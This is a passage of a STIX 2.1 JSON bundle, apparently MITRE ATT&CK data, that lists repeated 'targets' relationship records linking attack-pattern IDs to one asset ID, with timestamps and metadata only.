"relationship--f792c9fd-a93d-479e-82c8-fd3fd2eb1a54", "created": "2024-07-01T10:37:15.842607", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842609", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4df2a828-d9a2-4636-b11f-b04b33f326d1", "created": "2024-07-01T10:37:15.842616", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842617", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72218579-474a-4f95-bbcd-462898db72eb", "created": "2024-07-01T10:37:15.842624", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842626", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d6a51ad9-9b7b-400d-b17b-66a7d448d961", "created": "2024-07-01T10:37:15.842633", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842635", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d9fe6351-2901-4a63-ab91-2a47851fbcd5", "created": "2024-07-01T10:37:15.842641", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842643", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab22bee9-3a60-4b52-ab53-330037f13889", "created": "2024-07-01T10:37:15.842650", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842652", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9840307-0610-44e5-bda1-e5e95bbcd917", "created": "2024-07-01T10:37:15.842658", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842660", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2bd5cd5e-b920-4c7c-9683-68bc04abb4d6", "created": "2024-07-01T10:37:15.842667", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842668", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22a4e526-92fa-4641-ac46-6ab983de1153", "created": "2024-07-01T10:37:15.842675", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842677", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb4c1844-e731-40a2-a939-6741e237415c", "created": "2024-07-01T10:37:15.842684", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842686", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b154bca9-bf52-4580-b038-574ead67be17", "created": "2024-07-01T10:37:15.842692", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842694", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08f1608d-0fed-48db-8e9b-059348d2e8fc", "created": "2024-07-01T10:37:15.842701", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842703", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eda57024-a56a-472f-86ea-73b9982f6367", "created": "2024-07-01T10:37:15.842710", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842712", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f6b1e66-a35b-4367-be23-3507b8cda7b3", "created": "2024-07-01T10:37:15.842719", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842721", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46117442-6b64-46e3-bd04-35af7563e2aa", "created": "2024-07-01T10:37:15.842727", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842729", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d7d13fd-6084-45cf-bef7-453b8b681d0e", "created": "2024-07-01T10:37:15.842736", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842737", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8980372b-3605-49ee-809d-850501ba0b8d", "created": "2024-07-01T10:37:15.842744", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842746", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78cea2b1-1dc3-48ac-9b45-d6719f535077", "created": "2024-07-01T10:37:15.842753", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842755", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46e11b71-959b-4b0b-99d3-5f0400bccad6", "created": "2024-07-01T10:37:15.842761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc7acd58-9cb1-460f-a6bc-7afbb6746824", "created": "2024-07-01T10:37:15.842770", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842772", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b338249-7fb2-4ff0-8e31-3632a1f70dfa", "created": "2024-07-01T10:37:15.842778", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842780", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b89a8d7e-b4bd-4c97-a20e-ecd68d4d0cc7", "created": "2024-07-01T10:37:15.842787", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842789", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0ae4c77a-987d-4f9f-b100-8f59bd06df41", "created": "2024-07-01T10:37:15.842795", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842797", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ccb30af-df3a-4563-802f-46a37a6eef02", "created": "2024-07-01T10:37:15.842804", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842806", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--debbaab3-0d24-4bce-ba67-3f0227bfba72", "created": "2024-07-01T10:37:15.842813", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842814", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26887015-530e-4118-95b2-d4f05e042586", "created": "2024-07-01T10:37:15.842821", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842823", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a1e301b-804f-4ad1-a207-495e4231b8f5", "created": "2024-07-01T10:37:15.842830", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842832", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aef0f8a5-4ee3-43f3-ae3d-b195500299be", "created": "2024-07-01T10:37:15.842839", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842841", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16d7b541-8f9d-4fcd-9f8b-e9312c11d7a0", "created": "2024-07-01T10:37:15.842848", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842849", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8e2da363-bf47-49a6-a3a0-bc2c5db71f7f", "created": "2024-07-01T10:37:15.842856", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842858", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a8bded21-d088-413c-8b9f-ff2f7a89f02b", "created": "2024-07-01T10:37:15.842865", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842866", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f4116fd3-34a2-47b4-8d8d-08d1dd969953", "created": "2024-07-01T10:37:15.842873", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842875", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc33548c-f434-45e5-85e3-5403af7566cd", "created": "2024-07-01T10:37:15.842882", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842884", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--574f495a-4641-4978-940b-a02ecd071e03", "created": "2024-07-01T10:37:15.842891", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842893", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51621f86-6d1a-4c20-80bd-44c6a2035237", "created": "2024-07-01T10:37:15.842899", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842901", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c37d58e-5c28-4772-acec-4a4235354a3b", "created": "2024-07-01T10:37:15.842908", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842910", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3d5f705-aa92-4150-a15b-75dd025cfdd4", "created": "2024-07-01T10:37:15.842916", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842918", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91dee685-a447-4120-9992-7069f4f62f90", "created": "2024-07-01T10:37:15.842925", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842927", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--451feb4e-b0af-40f8-836e-1f0aa54c14a8", "created": "2024-07-01T10:37:15.842934", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842935", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--71041159-1609-4519-a05d-1ad2a9d98766", "created": "2024-07-01T10:37:15.842942", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842944", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c40074f-dea4-4807-8a45-617e968a6042", "created": "2024-07-01T10:37:15.842951", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842952", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d4a7025c-de92-4610-9a81-0940391b7d1d", "created": "2024-07-01T10:37:15.842959", "created_by_ref": 